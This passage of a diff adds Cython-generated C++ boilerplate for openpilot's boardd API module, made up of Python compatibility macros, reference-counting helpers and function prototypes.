Py_SET_REFCNT(obj, refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SET_SIZE(obj, size) +#else + #define __Pyx_SET_REFCNT(obj, refcnt) Py_REFCNT(obj) = (refcnt) + #define __Pyx_SET_SIZE(obj, size) Py_SIZE(obj) = (size) +#endif +#if CYTHON_ASSUME_SAFE_MACROS + #define __Pyx_PySequence_SIZE(seq) Py_SIZE(seq) +#else + #define __Pyx_PySequence_SIZE(seq) PySequence_Size(seq) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyIntObject PyLongObject + #define PyInt_Type PyLong_Type + #define PyInt_Check(op) PyLong_Check(op) + #define PyInt_CheckExact(op) PyLong_CheckExact(op) + #define __Pyx_Py3Int_Check(op) PyLong_Check(op) + #define __Pyx_Py3Int_CheckExact(op) PyLong_CheckExact(op) + #define PyInt_FromString PyLong_FromString + #define PyInt_FromUnicode PyLong_FromUnicode + #define PyInt_FromLong PyLong_FromLong + #define PyInt_FromSize_t PyLong_FromSize_t + #define PyInt_FromSsize_t PyLong_FromSsize_t + #define PyInt_AsLong PyLong_AsLong + #define PyInt_AS_LONG PyLong_AS_LONG + #define PyInt_AsSsize_t PyLong_AsSsize_t + #define PyInt_AsUnsignedLongMask PyLong_AsUnsignedLongMask + #define PyInt_AsUnsignedLongLongMask PyLong_AsUnsignedLongLongMask + #define PyNumber_Int PyNumber_Long +#else + #define __Pyx_Py3Int_Check(op) (PyLong_Check(op) || PyInt_Check(op)) + #define __Pyx_Py3Int_CheckExact(op) (PyLong_CheckExact(op) || PyInt_CheckExact(op)) +#endif +#if PY_MAJOR_VERSION >= 3 + #define PyBoolObject PyLongObject +#endif +#if PY_MAJOR_VERSION >= 3 && CYTHON_COMPILING_IN_PYPY + #ifndef PyUnicode_InternFromString + #define PyUnicode_InternFromString(s) PyUnicode_FromString(s) + #endif +#endif +#if PY_VERSION_HEX < 0x030200A4 + typedef long Py_hash_t; + #define __Pyx_PyInt_FromHash_t PyInt_FromLong + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsHash_t +#else + #define __Pyx_PyInt_FromHash_t PyInt_FromSsize_t + #define __Pyx_PyInt_AsHash_t __Pyx_PyIndex_AsSsize_t +#endif +#if CYTHON_USE_ASYNC_SLOTS + #if PY_VERSION_HEX >= 0x030500B1 + #define __Pyx_PyAsyncMethodsStruct PyAsyncMethods + #define __Pyx_PyType_AsAsync(obj) (Py_TYPE(obj)->tp_as_async) + #else + #define __Pyx_PyType_AsAsync(obj) ((__Pyx_PyAsyncMethodsStruct*) (Py_TYPE(obj)->tp_reserved)) + #endif +#else + #define __Pyx_PyType_AsAsync(obj) NULL +#endif +#ifndef __Pyx_PyAsyncMethodsStruct + typedef struct { + unaryfunc am_await; + unaryfunc am_aiter; + unaryfunc am_anext; + } __Pyx_PyAsyncMethodsStruct; +#endif + +#if defined(_WIN32) || defined(WIN32) || defined(MS_WINDOWS) + #if !defined(_USE_MATH_DEFINES) + #define _USE_MATH_DEFINES + #endif +#endif +#include +#ifdef NAN +#define __PYX_NAN() ((float) NAN) +#else +static CYTHON_INLINE float __PYX_NAN() { + float value; + memset(&value, 0xFF, sizeof(value)); + return value; +} +#endif +#if defined(__CYGWIN__) && defined(_LDBL_EQ_DBL) +#define __Pyx_truncl trunc +#else +#define __Pyx_truncl truncl +#endif + +#define __PYX_MARK_ERR_POS(f_index, lineno) \ + { __pyx_filename = __pyx_f[f_index]; (void)__pyx_filename; __pyx_lineno = lineno; (void)__pyx_lineno; __pyx_clineno = __LINE__; (void)__pyx_clineno; } +#define __PYX_ERR(f_index, lineno, Ln_error) \ + { __PYX_MARK_ERR_POS(f_index, lineno) goto Ln_error; } + +#ifdef CYTHON_EXTERN_C + #undef __PYX_EXTERN_C + #define __PYX_EXTERN_C CYTHON_EXTERN_C +#elif defined(__PYX_EXTERN_C) + #ifdef _MSC_VER + #pragma message ("Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead.") + #else + #warning Please do not define the '__PYX_EXTERN_C' macro externally. Use 'CYTHON_EXTERN_C' instead. + #endif +#else + #define __PYX_EXTERN_C extern "C++" +#endif + +#define __PYX_HAVE__selfdrive__boardd__boardd_api_impl +#define __PYX_HAVE_API__selfdrive__boardd__boardd_api_impl +/* Early includes */ +#include "ios" +#include "new" +#include "stdexcept" +#include "typeinfo" +#include +#include +#include +#include "panda.h" +#include "can_list_to_can_capnp.cc" +#ifdef _OPENMP +#include +#endif /* _OPENMP */ + +#if defined(PYREX_WITHOUT_ASSERTIONS) && !defined(CYTHON_WITHOUT_ASSERTIONS) +#define CYTHON_WITHOUT_ASSERTIONS +#endif + +typedef struct {PyObject **p; const char *s; const Py_ssize_t n; const char* encoding; + const char is_unicode; const char is_str; const char intern; } __Pyx_StringTabEntry; + +#define __PYX_DEFAULT_STRING_ENCODING_IS_ASCII 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_UTF8 0 +#define __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT (PY_MAJOR_VERSION >= 3 && __PYX_DEFAULT_STRING_ENCODING_IS_UTF8) +#define __PYX_DEFAULT_STRING_ENCODING "" +#define __Pyx_PyObject_FromString __Pyx_PyBytes_FromString +#define __Pyx_PyObject_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#define __Pyx_uchar_cast(c) ((unsigned char)c) +#define __Pyx_long_cast(x) ((long)x) +#define __Pyx_fits_Py_ssize_t(v, type, is_signed) (\ + (sizeof(type) < sizeof(Py_ssize_t)) ||\ + (sizeof(type) > sizeof(Py_ssize_t) &&\ + likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX) &&\ + (!is_signed || likely(v > (type)PY_SSIZE_T_MIN ||\ + v == (type)PY_SSIZE_T_MIN))) ||\ + (sizeof(type) == sizeof(Py_ssize_t) &&\ + (is_signed || likely(v < (type)PY_SSIZE_T_MAX ||\ + v == (type)PY_SSIZE_T_MAX))) ) +static CYTHON_INLINE int __Pyx_is_valid_index(Py_ssize_t i, Py_ssize_t limit) { + return (size_t) i < (size_t) limit; +} +#if defined (__cplusplus) && __cplusplus >= 201103L + #include + #define __Pyx_sst_abs(value) std::abs(value) +#elif SIZEOF_INT >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) abs(value) +#elif SIZEOF_LONG >= SIZEOF_SIZE_T + #define __Pyx_sst_abs(value) labs(value) +#elif defined (_MSC_VER) + #define __Pyx_sst_abs(value) ((Py_ssize_t)_abs64(value)) +#elif defined (__STDC_VERSION__) && __STDC_VERSION__ >= 199901L + #define __Pyx_sst_abs(value) llabs(value) +#elif defined (__GNUC__) + #define __Pyx_sst_abs(value) __builtin_llabs(value) +#else + #define __Pyx_sst_abs(value) ((value<0) ? -value : value) +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject*); +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject*, Py_ssize_t* length); +#define __Pyx_PyByteArray_FromString(s) PyByteArray_FromStringAndSize((const char*)s, strlen((const char*)s)) +#define __Pyx_PyByteArray_FromStringAndSize(s, l) PyByteArray_FromStringAndSize((const char*)s, l) +#define __Pyx_PyBytes_FromString PyBytes_FromString +#define __Pyx_PyBytes_FromStringAndSize PyBytes_FromStringAndSize +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char*); +#if PY_MAJOR_VERSION < 3 + #define __Pyx_PyStr_FromString __Pyx_PyBytes_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyBytes_FromStringAndSize +#else + #define __Pyx_PyStr_FromString __Pyx_PyUnicode_FromString + #define __Pyx_PyStr_FromStringAndSize __Pyx_PyUnicode_FromStringAndSize +#endif +#define __Pyx_PyBytes_AsWritableString(s) ((char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableSString(s) ((signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsWritableUString(s) ((unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsString(s) ((const char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsSString(s) ((const signed char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyBytes_AsUString(s) ((const unsigned char*) PyBytes_AS_STRING(s)) +#define __Pyx_PyObject_AsWritableString(s) ((char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableSString(s) ((signed char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsWritableUString(s) ((unsigned char*)(__pyx_uintptr_t) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsSString(s) ((const signed char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_AsUString(s) ((const unsigned char*) __Pyx_PyObject_AsString(s)) +#define __Pyx_PyObject_FromCString(s) __Pyx_PyObject_FromString((const char*)s) +#define __Pyx_PyBytes_FromCString(s) __Pyx_PyBytes_FromString((const char*)s) +#define __Pyx_PyByteArray_FromCString(s) __Pyx_PyByteArray_FromString((const char*)s) +#define __Pyx_PyStr_FromCString(s) __Pyx_PyStr_FromString((const char*)s) +#define __Pyx_PyUnicode_FromCString(s) __Pyx_PyUnicode_FromString((const char*)s) +#if CYTHON_COMPILING_IN_LIMITED_API +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const wchar_t *u) +{ + const wchar_t *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#else +static CYTHON_INLINE size_t __Pyx_Py_UNICODE_strlen(const Py_UNICODE *u) +{ + const Py_UNICODE *u_end = u; + while (*u_end++) ; + return (size_t)(u_end - u - 1); +} +#endif +#define __Pyx_PyUnicode_FromOrdinal(o) PyUnicode_FromOrdinal((int)o) +#define __Pyx_PyUnicode_FromUnicode(u) PyUnicode_FromUnicode(u, __Pyx_Py_UNICODE_strlen(u)) +#define __Pyx_PyUnicode_FromUnicodeAndLength PyUnicode_FromUnicode +#define __Pyx_PyUnicode_AsUnicode PyUnicode_AsUnicode +#define __Pyx_NewRef(obj) (Py_INCREF(obj), obj) +#define __Pyx_Owned_Py_None(b) __Pyx_NewRef(Py_None) +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b); +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject*); +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject*); +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x); +#define __Pyx_PySequence_Tuple(obj)\ + (likely(PyTuple_CheckExact(obj)) ? __Pyx_NewRef(obj) : PySequence_Tuple(obj)) +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject*); +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t); +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject*); +#if CYTHON_ASSUME_SAFE_MACROS +#define __pyx_PyFloat_AsDouble(x) (PyFloat_CheckExact(x) ? PyFloat_AS_DOUBLE(x) : PyFloat_AsDouble(x)) +#else +#define __pyx_PyFloat_AsDouble(x) PyFloat_AsDouble(x) +#endif +#define __pyx_PyFloat_AsFloat(x) ((float) __pyx_PyFloat_AsDouble(x)) +#if PY_MAJOR_VERSION >= 3 +#define __Pyx_PyNumber_Int(x) (PyLong_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Long(x)) +#else +#define __Pyx_PyNumber_Int(x) (PyInt_CheckExact(x) ? __Pyx_NewRef(x) : PyNumber_Int(x)) +#endif +#if CYTHON_USE_PYLONG_INTERNALS + #if PY_VERSION_HEX >= 0x030C00A7 + #ifndef _PyLong_SIGN_MASK + #define _PyLong_SIGN_MASK 3 + #endif + #ifndef _PyLong_NON_SIZE_BITS + #define _PyLong_NON_SIZE_BITS 3 + #endif + #define __Pyx_PyLong_Sign(x) (((PyLongObject*)x)->long_value.lv_tag & _PyLong_SIGN_MASK) + #define __Pyx_PyLong_IsNeg(x) ((__Pyx_PyLong_Sign(x) & 2) != 0) + #define __Pyx_PyLong_IsNonNeg(x) (!__Pyx_PyLong_IsNeg(x)) + #define __Pyx_PyLong_IsZero(x) (__Pyx_PyLong_Sign(x) & 1) + #define __Pyx_PyLong_IsPos(x) (__Pyx_PyLong_Sign(x) == 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) (__Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) ((Py_ssize_t) (((PyLongObject*)x)->long_value.lv_tag >> _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_SignedDigitCount(x)\ + ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * __Pyx_PyLong_DigitCount(x)) + #if defined(PyUnstable_Long_IsCompact) && defined(PyUnstable_Long_CompactValue) + #define __Pyx_PyLong_IsCompact(x) PyUnstable_Long_IsCompact((PyLongObject*) x) + #define __Pyx_PyLong_CompactValue(x) PyUnstable_Long_CompactValue((PyLongObject*) x) + #else + #define __Pyx_PyLong_IsCompact(x) (((PyLongObject*)x)->long_value.lv_tag < (2 << _PyLong_NON_SIZE_BITS)) + #define __Pyx_PyLong_CompactValue(x) ((1 - (Py_ssize_t) __Pyx_PyLong_Sign(x)) * (Py_ssize_t) __Pyx_PyLong_Digits(x)[0]) + #endif + typedef Py_ssize_t __Pyx_compact_pylong; + typedef size_t __Pyx_compact_upylong; + #else // Py < 3.12 + #define __Pyx_PyLong_IsNeg(x) (Py_SIZE(x) < 0) + #define __Pyx_PyLong_IsNonNeg(x) (Py_SIZE(x) >= 0) + #define __Pyx_PyLong_IsZero(x) (Py_SIZE(x) == 0) + #define __Pyx_PyLong_IsPos(x) (Py_SIZE(x) > 0) + #define __Pyx_PyLong_CompactValueUnsigned(x) ((Py_SIZE(x) == 0) ? 0 : __Pyx_PyLong_Digits(x)[0]) + #define __Pyx_PyLong_DigitCount(x) __Pyx_sst_abs(Py_SIZE(x)) + #define __Pyx_PyLong_SignedDigitCount(x) Py_SIZE(x) + #define __Pyx_PyLong_IsCompact(x) (Py_SIZE(x) == 0 || Py_SIZE(x) == 1 || Py_SIZE(x) == -1) + #define __Pyx_PyLong_CompactValue(x)\ + ((Py_SIZE(x) == 0) ? (sdigit) 0 : ((Py_SIZE(x) < 0) ? -(sdigit)__Pyx_PyLong_Digits(x)[0] : (sdigit)__Pyx_PyLong_Digits(x)[0])) + typedef sdigit __Pyx_compact_pylong; + typedef digit __Pyx_compact_upylong; + #endif + #if PY_VERSION_HEX >= 0x030C00A5 + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->long_value.ob_digit) + #else + #define __Pyx_PyLong_Digits(x) (((PyLongObject*)x)->ob_digit) + #endif +#endif +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII +static int __Pyx_sys_getdefaultencoding_not_ascii; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + PyObject* ascii_chars_u = NULL; + PyObject* ascii_chars_b = NULL; + const char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + if (strcmp(default_encoding_c, "ascii") == 0) { + __Pyx_sys_getdefaultencoding_not_ascii = 0; + } else { + char ascii_chars[128]; + int c; + for (c = 0; c < 128; c++) { + ascii_chars[c] = (char) c; + } + __Pyx_sys_getdefaultencoding_not_ascii = 1; + ascii_chars_u = PyUnicode_DecodeASCII(ascii_chars, 128, NULL); + if (!ascii_chars_u) goto bad; + ascii_chars_b = PyUnicode_AsEncodedString(ascii_chars_u, default_encoding_c, NULL); + if (!ascii_chars_b || !PyBytes_Check(ascii_chars_b) || memcmp(ascii_chars, PyBytes_AS_STRING(ascii_chars_b), 128) != 0) { + PyErr_Format( + PyExc_ValueError, + "This module compiled with c_string_encoding=ascii, but default encoding '%.200s' is not a superset of ascii.", + default_encoding_c); + goto bad; + } + Py_DECREF(ascii_chars_u); + Py_DECREF(ascii_chars_b); + } + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + Py_XDECREF(ascii_chars_u); + Py_XDECREF(ascii_chars_b); + return -1; +} +#endif +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT && PY_MAJOR_VERSION >= 3 +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_DecodeUTF8(c_str, size, NULL) +#else +#define __Pyx_PyUnicode_FromStringAndSize(c_str, size) PyUnicode_Decode(c_str, size, __PYX_DEFAULT_STRING_ENCODING, NULL) +#if __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +static char* __PYX_DEFAULT_STRING_ENCODING; +static int __Pyx_init_sys_getdefaultencoding_params(void) { + PyObject* sys; + PyObject* default_encoding = NULL; + char* default_encoding_c; + sys = PyImport_ImportModule("sys"); + if (!sys) goto bad; + default_encoding = PyObject_CallMethod(sys, (char*) (const char*) "getdefaultencoding", NULL); + Py_DECREF(sys); + if (!default_encoding) goto bad; + default_encoding_c = PyBytes_AsString(default_encoding); + if (!default_encoding_c) goto bad; + __PYX_DEFAULT_STRING_ENCODING = (char*) malloc(strlen(default_encoding_c) + 1); + if (!__PYX_DEFAULT_STRING_ENCODING) goto bad; + strcpy(__PYX_DEFAULT_STRING_ENCODING, default_encoding_c); + Py_DECREF(default_encoding); + return 0; +bad: + Py_XDECREF(default_encoding); + return -1; +} +#endif +#endif + + +/* Test for GCC > 2.95 */ +#if defined(__GNUC__) && (__GNUC__ > 2 || (__GNUC__ == 2 && (__GNUC_MINOR__ > 95))) + #define likely(x) __builtin_expect(!!(x), 1) + #define unlikely(x) __builtin_expect(!!(x), 0) +#else /* !__GNUC__ or GCC < 2.95 */ + #define likely(x) (x) + #define unlikely(x) (x) +#endif /* __GNUC__ */ +static CYTHON_INLINE void __Pyx_pretend_to_initialize(void* ptr) { (void)ptr; } + +#if !CYTHON_USE_MODULE_STATE +static PyObject *__pyx_m = NULL; +#endif +static int __pyx_lineno; +static int __pyx_clineno = 0; +static const char * __pyx_cfilenm = __FILE__; +static const char *__pyx_filename; + +/* #### Code section: filename_table ### */ + +static const char *__pyx_f[] = { + "", + "selfdrive/boardd/boardd_api_impl.pyx", +}; +/* #### Code section: utility_code_proto_before_types ### */ +/* #### Code section: numeric_typedefs ### */ +/* #### Code section: complex_type_declarations ### */ +/* #### Code section: type_declarations ### */ + +/*--- Type declarations ---*/ +/* #### Code section: utility_code_proto ### */ + +/* --- Runtime support code (head) --- */ +/* Refnanny.proto */ +#ifndef CYTHON_REFNANNY + #define CYTHON_REFNANNY 0 +#endif +#if CYTHON_REFNANNY + typedef struct { + void (*INCREF)(void*, PyObject*, Py_ssize_t); + void (*DECREF)(void*, PyObject*, Py_ssize_t); + void (*GOTREF)(void*, PyObject*, Py_ssize_t); + void (*GIVEREF)(void*, PyObject*, Py_ssize_t); + void* (*SetupContext)(const char*, Py_ssize_t, const char*); + void (*FinishContext)(void**); + } __Pyx_RefNannyAPIStruct; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNanny = NULL; + static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname); + #define __Pyx_RefNannyDeclarations void *__pyx_refnanny = NULL; +#ifdef WITH_THREAD + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + if (acquire_gil) {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + PyGILState_Release(__pyx_gilstate_save);\ + } else {\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__));\ + } + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } +#else + #define __Pyx_RefNannySetupContext(name, acquire_gil)\ + __pyx_refnanny = __Pyx_RefNanny->SetupContext((name), (__LINE__), (__FILE__)) + #define __Pyx_RefNannyFinishContextNogil() __Pyx_RefNannyFinishContext() +#endif + #define __Pyx_RefNannyFinishContextNogil() {\ + PyGILState_STATE __pyx_gilstate_save = PyGILState_Ensure();\ + __Pyx_RefNannyFinishContext();\ + PyGILState_Release(__pyx_gilstate_save);\ + } + #define __Pyx_RefNannyFinishContext()\ + __Pyx_RefNanny->FinishContext(&__pyx_refnanny) + #define __Pyx_INCREF(r) __Pyx_RefNanny->INCREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_DECREF(r) __Pyx_RefNanny->DECREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GOTREF(r) __Pyx_RefNanny->GOTREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_GIVEREF(r) __Pyx_RefNanny->GIVEREF(__pyx_refnanny, (PyObject *)(r), (__LINE__)) + #define __Pyx_XINCREF(r) do { if((r) == NULL); else {__Pyx_INCREF(r); }} while(0) + #define __Pyx_XDECREF(r) do { if((r) == NULL); else {__Pyx_DECREF(r); }} while(0) + #define __Pyx_XGOTREF(r) do { if((r) == NULL); else {__Pyx_GOTREF(r); }} while(0) + #define __Pyx_XGIVEREF(r) do { if((r) == NULL); else {__Pyx_GIVEREF(r);}} while(0) +#else + #define __Pyx_RefNannyDeclarations + #define __Pyx_RefNannySetupContext(name, acquire_gil) + #define __Pyx_RefNannyFinishContextNogil() + #define __Pyx_RefNannyFinishContext() + #define __Pyx_INCREF(r) Py_INCREF(r) + #define __Pyx_DECREF(r) Py_DECREF(r) + #define __Pyx_GOTREF(r) + #define __Pyx_GIVEREF(r) + #define __Pyx_XINCREF(r) Py_XINCREF(r) + #define __Pyx_XDECREF(r) Py_XDECREF(r) + #define __Pyx_XGOTREF(r) + #define __Pyx_XGIVEREF(r) +#endif +#define __Pyx_Py_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; Py_XDECREF(tmp);\ + } while (0) +#define __Pyx_XDECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_XDECREF(tmp);\ + } while (0) +#define __Pyx_DECREF_SET(r, v) do {\ + PyObject *tmp = (PyObject *) r;\ + r = v; __Pyx_DECREF(tmp);\ + } while (0) +#define __Pyx_CLEAR(r) do { PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);} while(0) +#define __Pyx_XCLEAR(r) do { if((r) != NULL) {PyObject* tmp = ((PyObject*)(r)); r = NULL; __Pyx_DECREF(tmp);}} while(0) + +/* TupleAndListFromArray.proto */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE PyObject* __Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n); +static CYTHON_INLINE PyObject* __Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n); +#endif + +/* IncludeStringH.proto */ +#include + +/* BytesEquals.proto */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals); + +/* UnicodeEquals.proto */ +static CYTHON_INLINE int __Pyx_PyUnicode_Equals(PyObject* s1, PyObject* s2, int equals); + +/* fastcall.proto */ +#define __Pyx_Arg_VARARGS(args, i) PyTuple_GET_ITEM(args, i) +#define __Pyx_NumKwargs_VARARGS(kwds) PyDict_Size(kwds) +#define __Pyx_KwValues_VARARGS(args, nargs) NULL +#define __Pyx_GetKwValue_VARARGS(kw, kwvalues, s) __Pyx_PyDict_GetItemStrWithError(kw, s) +#define __Pyx_KwargsAsDict_VARARGS(kw, kwvalues) PyDict_Copy(kw) +#if CYTHON_METH_FASTCALL + #define __Pyx_Arg_FASTCALL(args, i) args[i] + #define __Pyx_NumKwargs_FASTCALL(kwds) PyTuple_GET_SIZE(kwds) + #define __Pyx_KwValues_FASTCALL(args, nargs) ((args) + (nargs)) + static CYTHON_INLINE PyObject * __Pyx_GetKwValue_FASTCALL(PyObject *kwnames, PyObject *const *kwvalues, PyObject *s); + #define __Pyx_KwargsAsDict_FASTCALL(kw, kwvalues) _PyStack_AsDict(kwvalues, kw) +#else + #define __Pyx_Arg_FASTCALL __Pyx_Arg_VARARGS + #define __Pyx_NumKwargs_FASTCALL __Pyx_NumKwargs_VARARGS + #define __Pyx_KwValues_FASTCALL __Pyx_KwValues_VARARGS + #define __Pyx_GetKwValue_FASTCALL __Pyx_GetKwValue_VARARGS + #define __Pyx_KwargsAsDict_FASTCALL __Pyx_KwargsAsDict_VARARGS +#endif +#if CYTHON_COMPILING_IN_CPYTHON +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_VARARGS(args, start), stop - start) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) __Pyx_PyTuple_FromArray(&__Pyx_Arg_FASTCALL(args, start), stop - start) +#else +#define __Pyx_ArgsSlice_VARARGS(args, start, stop) PyTuple_GetSlice(args, start, stop) +#define __Pyx_ArgsSlice_FASTCALL(args, start, stop) PyTuple_GetSlice(args, start, stop) +#endif + +/* RaiseDoubleKeywords.proto */ +static void __Pyx_RaiseDoubleKeywordsError(const char* func_name, PyObject* kw_name); + +/* ParseKeywords.proto */ +static int __Pyx_ParseOptionalKeywords(PyObject *kwds, PyObject *const *kwvalues, + PyObject **argnames[], + PyObject *kwds2, PyObject *values[], Py_ssize_t num_pos_args, + const char* function_name); + +/* RaiseArgTupleInvalid.proto */ +static void __Pyx_RaiseArgtupleInvalid(const char* func_name, int exact, + Py_ssize_t num_min, Py_ssize_t num_max, Py_ssize_t num_found); + +/* GetItemInt.proto */ +#define __Pyx_GetItemInt(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Fast(o, (Py_ssize_t)i, is_list, wraparound, boundscheck) :\ + (is_list ? (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL) :\ + __Pyx_GetItemInt_Generic(o, to_py_func(i)))) +#define __Pyx_GetItemInt_List(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_List_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "list index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +#define __Pyx_GetItemInt_Tuple(o, i, type, is_signed, to_py_func, is_list, wraparound, boundscheck)\ + (__Pyx_fits_Py_ssize_t(i, type, is_signed) ?\ + __Pyx_GetItemInt_Tuple_Fast(o, (Py_ssize_t)i, wraparound, boundscheck) :\ + (PyErr_SetString(PyExc_IndexError, "tuple index out of range"), (PyObject*)NULL)) +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, + int wraparound, int boundscheck); +static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j); +static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, + int is_list, int wraparound, int boundscheck); + +/* MoveIfSupported.proto */ +#if __cplusplus >= 201103L || (defined(_MSC_VER) && _MSC_VER >= 1600) + #include + #define __PYX_STD_MOVE_IF_SUPPORTED(x) std::move(x) +#else + #define __PYX_STD_MOVE_IF_SUPPORTED(x) x +#endif + +/* IncludeStructmemberH.proto */ +#include + +/* FixUpExtensionType.proto */ +#if CYTHON_USE_TYPE_SPECS +static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type); +#endif + +/* FetchSharedCythonModule.proto */ +static PyObject *__Pyx_FetchSharedCythonABIModule(void); + +/* FetchCommonType.proto */ +#if !CYTHON_USE_TYPE_SPECS +static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type); +#else +static PyTypeObject* __Pyx_FetchCommonTypeFromSpec(PyObject *module, PyType_Spec *spec, PyObject *bases); +#endif + +/* PyMethodNew.proto */ +#if PY_MAJOR_VERSION >= 3 +static PyObject *__Pyx_PyMethod_New(PyObject *func, PyObject *self, PyObject *typ) { + CYTHON_UNUSED_VAR(typ); + if (!self) + return __Pyx_NewRef(func); + return PyMethod_New(func, self); +} +#else + #define __Pyx_PyMethod_New PyMethod_New +#endif + +/* PyObjectGetAttrStr.proto */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name); +#else +#define __Pyx_PyObject_GetAttrStr(o,n) PyObject_GetAttr(o,n) +#endif + +/* PyVectorcallFastCallDict.proto */ +#if CYTHON_METH_FASTCALL +static CYTHON_INLINE PyObject *__Pyx_PyVectorcall_FastCallDict(PyObject *func, __pyx_vectorcallfunc vc, PyObject *const *args, size_t nargs, PyObject *kw); +#endif + +/* CythonFunctionShared.proto */ +#define __Pyx_CyFunction_USED +#define __Pyx_CYFUNCTION_STATICMETHOD 0x01 +#define __Pyx_CYFUNCTION_CLASSMETHOD 0x02 +#define __Pyx_CYFUNCTION_CCLASS 0x04 +#define __Pyx_CYFUNCTION_COROUTINE 0x08 +#define __Pyx_CyFunction_GetClosure(f)\ + (((__pyx_CyFunctionObject *) (f))->func_closure) +#if PY_VERSION_HEX < 0x030900B1 + #define 